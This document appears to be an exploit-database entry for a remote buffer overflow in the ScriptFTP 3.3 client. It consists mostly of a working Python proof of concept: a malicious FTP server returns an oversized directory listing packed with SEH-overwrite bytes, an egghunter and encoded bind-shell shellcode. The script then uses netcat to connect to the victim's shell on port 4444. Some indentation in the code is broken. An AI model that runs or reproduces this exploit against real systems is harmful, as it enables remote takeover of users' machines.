ScriptFTP <= 3.3 Remote Buffer Overflow (LIST)

2011-09-19T00:00:00
ID 1337DAY-ID-16833
Type zdt
Reporter modpr0be
Modified 2011-09-19T00:00:00

Description

Exploit for windows platform in category remote exploits

                                        
                                            # Exploit Title: ScriptFTP <=3.3 Remote Buffer Overflow (LIST)
# Date: September 20, 2011
# Author: modpr0be
# Software Link: http://www.scriptftp.com/ScriptFTP_3_3_setup.exe
# Version: 3.3
# Tested on: Windows XP SP3, Windows Server 2003 SP1 (SE) (VMware 3.1.4 build-385536)
# CVE : -
#
# Thanks: offsec, exploit-db, corelanc0d3r, 5M7X, loneferret, mr_me, _sinner
#
# You should create your own script to work with ScriptFTP
# for example; enable passive and get the remote directory
# on your evil ftp server.
#
# my example script:
# OPENHOST("8.8.8.8","ftp","ftp")
# SETPASSIVE(ENABLED)
# GETLIST($list,REMOTE_FILES)
# CLOSEHOST
# save it to a file with .ftp extension (eg: exploit.ftp)
 
# root@bt :/# python scriptftp-bof-poc.py
# [*] ScriptFTP 3.3 Remote Buffer Overflow POC
# [*] by modpr0be[at]digital-echidna[dot]org.
# [*] thanks a lot to cyb3r.anbu | otoy :)
# =============================================
# [*] Evil FTP Server Ready
# [*] Server initiated.
# [*] Awaiting connection...
# [*] Connection created by 172.16.87.129.
# [*] Establishing session.
# [*] Pwning in progress..
# [*] This may take up 50 seconds or less.
# [!] Hunter is hunting the Egg ;)
# [!] Waiting for a shell..
# [!] 0wn3d..!
#
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\ScriptFTP>
#
# Yes, this poc is using PASSIVE connection and it will
# take some time to establish. I love the way we wait for a shell ;)
 
#!/usr/bin/python
 
import socket
import os
import sys
import time
 
class ftp_server:
    def __init__(self):
        self.host = '0.0.0.0'
        self.passive_port = 7214
        self.log("""
[*] ScriptFTP <=3.3 Remote Buffer Overflow POC
[*] by modpr0be[at]digital-echidna[dot]org
[*] thanks a lot to cyb3r.anbu | otoy :)
=============================================
[*] Evil FTP Server Ready""")
 
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind(('', 21))
        self.sock.listen(1)
 
        a = self.passive_port/256
        b = self.passive_port%256
        self.tuple_port = (a, b)
        self.host_join = ','.join(self.host.split('.'))
        self.passive = False
 
        self.log("[*] Server initiated.")
 
    def log(self, msg):
        print msg
 
    def get(self):
        return self.conn.recv(1024).replace('\r', '').replace('\n', '')
 
    def getcwd(self):
        return os.getcwd().split(chr(92))[-1]
     
    def put(self, ftr):
        x = {
 
            150:" Data connection accepted from %s:%s; transfer starting.\r\n226 Listing completed."%(self.host, self.passive_port),
            200:" Type okay.",
            220:" %s Server is ready."%self.host,
            226:" Listing completed.",
            227:" Entering Passive Mode (%s,%s,%s)"%(self.host_join, self.tuple_port[0], self.tuple_port[1]),
            230:" User logged in, proceed.",
            250:' "/%s" is new cwd.'%self.getcwd(),
            257:' "/%s" is cwd.'%self.getcwd(),
            331:" User name okay, need password.",
            502:" Command not implemented.",
            551:" Requested action aborted. Page type unknown."     
 
                   }[ftr]
 
        s = '%s%s\r\n'%(ftr, x)
        self.conn.send(s)
        return s
 
    def main(self):
        self.log("[*] Awaiting connection...")
        self.conn, addr = self.sock.accept ()
        self.log("[*] Connection created by %s.\n[*] Establishing session."%addr[0])
    self.put(220)
        self.log("[*] Pwning in progress..")
    self.log("[*] This may take up 50 seconds or less.")
 
        while 1:
            try:
                data = self.get().upper()
            except socket.error:
                self.conn.close()
                self.sock.shutdown(socket.SHUT_RDWR)
                raise socket.error
         
            if data[:4] == 'USER':   s = 331
            elif data[:4] == 'PASS': s = 230
            elif data[:3] == 'PWD':  s = 257
            elif data[:4] == 'TYPE': s = 200
            elif data[:4] == 'PASV':
                # create passive port
                self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                self.sock2.bind(('', self.passive_port ))
                self.sock2.listen(1)
                s = self.put(227)
                self.conn2, addr = self.sock2.accept()
                self.passive = True
                s = 0 # don't routine
       
            elif data[:3] == 'CWD':
                try:
                    os.chdir('..%s'%data.split(' ')[-1])
                    s = 250
                except OSError:
                    s = 551
             
            elif data[:4] == 'LIST':
                s = self.put(150)
                s = self.passive_do(1)
                s = 0 # don't routine
        print "[!] Hunter is hunting the Egg ;)"
        time.sleep(50)
        print "[!] Waiting for a shell.."
        time.sleep(2)
        print "[!] 0wn3d..!\n"
        os.system("nc %s 4444"%addr[0])
        sys.exit()
            else:
        s = 502
 
            if s:
                s = self.put(s)
 
    def passive_do(self, id):
        if id == 1:
        #bind to port 4444
        bind = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQ"
                    "APA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1A"
                    "IQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JBKLI"
                    "XTIKPKPKPC0DIZENQXRS4DK0RNPTKPRLLTKR2LTTKBRO"
                    "8LOVWPJMVNQKONQGPFLOL1Q3LLBNLMPY18OLMM1I7K2J"
                    "P0RR74KPRN0DKOROLKQZ0DKOPRX4EY0RTPJKQXP0PTK1"
                    "8N8DKQHMPKQHSJCOLOYTKODDKM1HVNQKONQY0VLWQHOL"
                    "MKQWWP8IPCEL4LCSML8OK3MMTRUK2R84KQHMTM1YCQV4"
                    "KLLPKTKPXMLKQZ3TKM4TKKQ8P4IQ4O4MTQKQK1QPYPZ2"
                    "1KOK0PXQO1J4KN2ZKU61MQXNSP2KPKPS82W2SP21OQD3"
                    "80LSGNFLGKOZ56X4PM1KPKPO9XDPTPPQXNI3P2KM0KOX"
                    "U0PPPPP0POP0POPPPQXJJLOIOYPKOJ5SYGWNQIKPSBHM"
                    "2KPN1QLU9YVRJLPQFQGC8GRIK07QWKO8U0SR7C87GZIP"
                    "8KOKOJ50SR3PWRHCDZLOKYQKO8UPW5997QX2URN0MQQK"
                    "OYEQX33BMQTKPSYJCPWPWR701JV2JMBR926IRKMQVGWO"
                    "TMTOLKQKQTMPDNDLP7VKPQ40TB0PVPVPVOV26PNQFR6P"
                    "SR6C8SIXLOOTFKOXUCY9P0N0VPFKONPS8KXSWMMQPKO9"
                    "E7KL0X5W2QFQXVFTUWMEMKOHUOLKV3LKZU0KKYP2ULEW"
                    "KQ7MCT2BO2JKPQCKOZ5A")
         
        # 32bit egghunter from corelanc0d3r, thx ;)
        egghunter = ("PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYA"
             "IAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA5"
             "8AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZB"
             "ABABABAB30APB944JBQVCQGZKOLO12PRQZKR1"
             "HXMNNOLKUQJRTJO6XKPNPKP44TKJZ6O3EJJ6O"
             "SEYWKOYWA")
                    
        junk = "A" * 1746       #junk
        nseh = "\x61\x62"       #nseh
            seh = "\x45\x5B"        #seh ppr somewhere on scriptftp dir
             
        #prepare for align
            align = "\x60"          #pushad
        align += "\x73"         #nop/align
        align += "\x53"         #push ebx
        align += "\x73"         #nop/align
            align += "\x58"         #pop eax
        align += "\x73"         #nop/align
        align += "\x05\x02\x11"         #add eax,0x11000200
        align += "\x73"                 #nop/align
            align += "\x2d\x01\x11"         #sub eax,0x11000120
        align += "\x73"                 #nop/align
         
        #walking
        walk = "\x50"           #push eax
        walk += "\x73"          #nop/align
        walk += "\xc3"          #ret
     
        #align again
        align2 = "0t0t" + "\x73\x57\x73\x58\x73"        #nop/push edi/nop/pop eax/nop
        align2 += "\xb9\x1b\xaa"            #mov ecx,0xaa001b00
        align2 += "\xe8\x73"            #add al,ch + nop
        align2 += "\x50\x73\xc3"            #push eax,nop,ret
 
        sampah1 = "\x44" * 106 + "\x73"     #eax+106/align nop
        sampah2 = "\x42" * 544          #right after shellcode
         
        crash = junk+nseh+seh+align+walk+sampah1+egghunter+sampah2+align2+bind+sampah1
 
            res = """-rwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+crash+""".txt\r\ndrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 A\r\nrwxr-xr-x   5 ftpuser  ftpusers       512 Jul 26  2001 """+ crash +".txt\r\n"
 
        self.conn2.send(res)
        # self.conn2.send('\r\n') # send blank
    return res
 
try:
    ftp_server().main()
except socket.error:
        print "[!] Socket is not ready, shutting down...\n"



#  0day.today [2016-04-19]  #